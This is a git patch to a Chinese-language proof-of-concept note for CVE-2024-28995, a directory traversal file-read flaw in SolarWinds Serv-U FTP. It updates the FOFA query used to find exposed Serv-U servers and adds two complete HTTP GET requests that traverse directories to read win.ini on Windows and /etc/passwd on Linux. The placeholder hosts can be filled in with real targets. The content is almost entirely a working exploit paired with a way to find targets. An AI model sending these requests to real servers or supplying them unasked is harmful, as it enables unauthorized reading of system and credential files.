From 4fe572e1a528e2647c9e01ae357eccf5c168c09c Mon Sep 17 00:00:00 2001
From: wy876 <TgsstfA@protonmail.com>
Date: Sat, 15 Jun 2024 00:33:31 +0800
Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=95=B0=E6=8D=AE=E5=8C=85?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...Winds-Serv-U目录遍历漏洞(CVE-2024-28995).md | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md b/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
index 8f1760e..eb2288d 100644
--- a/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
+++ b/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
@@ -7,14 +7,26 @@ CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞，攻击者
 ## fofa
 
 ```
-app="SolarWinds-Serv-U-FTP"
+server="Serv-U"
 ```
 
 ## poc
 
 ```
-GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1
-Host: 
+GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
+Host: xx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+```
+GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
 ```
 
 ![image-20240614211748043](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406142117114.png)
\ No newline at end of file